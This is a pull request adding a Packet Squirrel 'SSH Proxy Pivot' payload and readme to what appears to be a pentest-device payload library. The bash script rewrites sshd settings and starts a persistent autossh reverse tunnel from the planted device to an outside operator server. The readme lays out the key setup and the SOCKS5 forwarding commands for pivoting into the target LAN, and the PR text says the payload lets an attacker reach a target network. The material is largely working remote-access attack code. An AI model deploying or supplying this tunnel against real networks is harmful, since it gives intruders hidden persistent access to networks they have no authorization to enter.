### PR TITLE
SSH Proxy Pivot

### DIFF
--- a/payloads/library/remote-access/SSH-proxy-pivot/payload.sh
+++ b/payloads/library/remote-access/SSH-proxy-pivot/payload.sh
@@ -1,0 +1,82 @@
+#!/bin/bash
+# Title: SSH Socks5 Proxy tunnel to Squirrel
+# Description: Creates Dynamic port forwarding available on Squirrel to allow for pivoting inside network from remote server.
+# Author: BlackPropaganda
+# Version: 0.2
+# Category: Remote-Access
+# Net Mode: NAT
+# Firmware: 3.2
+#
+# LED State Descriptions
+# Magenta Solid - SSH connecting
+# Amber - SSH connection attempted
+#
+
+NETMODE NAT
+LED SETUP
+
+# More information can be found in the readme.
+
+autossh_host="squirrel@<remote_ssh_host>"
+autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
+autossh_port="22"
+autossh_remoteport="2222"
+autossh_localport="22"
+switch=SWITCH
+interface="eth1"
+
+if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
+   echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
+   LED FAIL
+   exit 1
+fi
+
+#
+# the following was slightly modified from dark_pyrro (the legend) via:
+# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
+#
+
+# waiting until eth1 acquires IP address
+while ! ifconfig "$interface" | grep "inet addr"; do sleep 1; done
+
+# modifying SSHD to support TCP forwarding
+echo "Match User root" >> /etc/ssh/sshd_config
+echo "       AllowTcpForwarding yes"  >> /etc/ssh/sshd_config
+echo -e "       GatewayPorts yes\n" >> /etc/ssh/sshd_config
+
+
+echo -e "starting reconfigured server.\n" >> /root/payloads/$switch/debug.txt
+
+# starting sshd and waiting for process to start
+/etc/init.d/sshd start
+until netstat -tulpn | grep -qi "sshd"
+do
+    sleep 1
+done
+
+# stopping autossh
+/etc/init.d/autossh stop
+
+#
+# Much like the SSH server, AutoSSH has a configuration file. This
+# needs to be configured to support this connection as a daemon.
+#
+# Create a "fresh template" for the autossh configuration
+# Starting with an empty autossh file in /etc/config
+# isn't something that uci is very fond of
+echo "config autossh" > /etc/config/autossh
+echo "        option ssh" >> /etc/config/autossh
+echo "        option enabled" >> /etc/config/autossh
+
+
+# UCI configuration and commission
+uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
+uci set autossh.@autossh[0].enabled="1"
+uci commit autossh
+
+LED ATTACK
+
+# starting autossh
+/etc/init.d/autossh start
+
+# Happy Hunting.

--- a/payloads/library/remote-access/SSH-proxy-pivot/readme.md
+++ b/payloads/library/remote-access/SSH-proxy-pivot/readme.md
@@ -1,4 +1,4 @@
-# Squirrel SSH Proxy Pivor
+# Squirrel SSH Proxy Pivot
 ___
 Have you ever laid down a Squirrel and thought 'darn I really want to pivot through this network, 
 but I left all my leet tools on my other machine.'
@@ -23,7 +23,7 @@ For this payload to function properly, the following must be configured
 
 * SSH Key based Authentication
   * Remote SSH Host
-  * Packet Squirel
+  * Packet Squirrel
 * SSH Port forwarding
   * Both Hosts are required to support this
 
@@ -58,7 +58,7 @@ ___
 ### Initiating the Proxy Connection
 ___
 
-Copy the squirrel SSH key to the Remote SSH Server
+Copy the squirrel SSH key to the Remote SSH Server then connect to the squirrel
 
     ssh -L 1080:localhost:1080 $user@$remote_server_ip "ssh -i /home/sshuser/squirrel_rsa -p $lport_fwd_port -D 1080 root@127.0.0.1"
 

--- a/payloads/library/remote-access/SSH-proxy-pivot/readme.md
+++ b/payloads/library/remote-access/SSH-proxy-pivot/readme.md
@@ -1,0 +1,72 @@
+# Squirrel SSH Proxy Pivor
+___
+Have you ever laid down a Squirrel and thought 'darn I really want to pivot through this network, 
+but I left all my leet tools on my other machine.'
+
+Those days are over with this payload. Using a similar method to accessing the squirrel via SSH 
+we can initiate a Dynamic Port Forwarding tunnel into the target network, just adding one more 
+hop (bunnies should be good at this).
+
+    Proxy Client     Remote SSH Host     Packet Squirrel        Proxy Target
+          ___              ___             (inside LAN)              ___
+         /  /|            /  /|             _______                 /  /|
+        /__/ |  <=====>  /__/ |   <=====>  /______/`)   <=====>    /__/ |
+        |--| |           |--| |           (__[__]_)/               |--| |
+        | *|/            | *|/                                     | *|/
+
+
+___
+### Remote SSH Configuration
+___
+
+For this payload to function properly, the following must be configured
+
+* SSH Key based Authentication
+  * Remote SSH Host
+  * Packet Squirel
+* SSH Port forwarding
+  * Both Hosts are required to support this
+
+A separate SSH server is required for this payload to function. This server must be configured
+to accept pubkey authentication for at least one user and contain the ssh key file on the Squirrel.
+___
+#### Remote SSH Server Pubkey Authentication
+The configuration for the remote SSH server for pubkey authentication can be found here: https://gist.github.com/BlackPropaganda/3c50e1993014bd59905df77c2fd46869
+
+Configuring the squirrel is similar. Just enroll the pubkey to /root/.ssh/authorized_keys. There's no need to modify the
+SSHD config file since the config file does not persist between boots and pubkey authentication is enabled by default.
+___
+#### SSH Port Forwarding configuration on Remote SSH server
+
+GatewayPorts and AllowTcpForwarding need to be enabled on the Remote SSH Server in order for the
+proxy to function properly. More on this here https://gist.github.com/BlackPropaganda/2801c43a7754ac56b80e3d03ede29169
+
+The Remote SSH Server will need a copy of the key generated for the Squirrel.
+
+___
+#### Squirrel SSH Pubkey Authentication
+
+Lets create a new key for the Squirrel
+
+    ssh-keygen -t rsa -b 1024 -f squirrel_rsa
+
+In arming mode, run this:
+
+    ssh-copy-id -i squirrel_rsa root@172.16.32.1
+
+___
+### Initiating the Proxy Connection
+___
+
+Copy the squirrel SSH key to the Remote SSH Server
+
+    ssh -L 1080:localhost:1080 $user@$remote_server_ip "ssh -i /home/sshuser/squirrel_rsa -p $lport_fwd_port -D 1080 root@127.0.0.1"
+
+Where:
+* /home/sshuser/squirrel_rsa is the SSH key generated for the Squirrel, residing on the Remote SSH Server
+* 1080 is the proxy port (socks5 default)
+* $user is a user with TCP forwarding enabled on the Remote SSH Server
+* $remote_server_ip is the Remote SSH Server IP
+* $lport_fwd_port is the Squirrels ssh server reachable by the port configured in the Payload.
+
+Goes without saying, but use at your own risk. Don't do bad things.


### PR DESCRIPTION
Added payload which allows for an attacker to initiate a proxy connection to the Squirrel, and pivot into a target network.